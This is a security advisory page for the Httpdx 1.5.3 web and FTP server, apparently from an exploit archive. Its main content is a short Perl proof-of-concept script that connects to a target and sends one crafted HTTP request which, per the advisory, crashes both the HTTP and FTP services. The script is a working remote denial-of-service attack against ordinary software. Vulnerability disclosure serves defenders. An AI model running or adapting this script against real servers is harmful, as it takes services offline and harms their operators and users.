Httpdx 1.5.3 remote break services

2010.03.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl # # Program : Httpdx v1.5.3 # PoC : Remote Break Services # Homepage : http://sourceforge.net/projects/httpdx/ # Found by : Jonathan Salwan # This Advisory : Jonathan Salwan # Contact : submit@shell-storm.org # # # //----- Application description # # Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs # with only few threads. Includes directory listing, virtual hosting, basic auth., support # for PHP, Perl, Python, SSI, etc. All settings in one config/script file. # # # //----- Description of vulnerability # # The vulnerability is caused due to an input validation error when processing HTTP requests. This can be # exploited to break all services http & ftp. # # # # //----- Credits # # http://www.shell-storm.org <submit@shell-storm.org> # # use IO::Socket; print "\n[x]Httpdx v1.5.3 - Remote Break Services\n"; if (@ARGV < 1) { print "[-] Usage: <file.pl> <host> <port>\n"; print "[-] Exemple: file.pl 127.0.0.1 80\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n"; print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n"; $msg = "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n"; $socket->send($msg); print "\n[+] Done.\n\n"; close($socket);


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top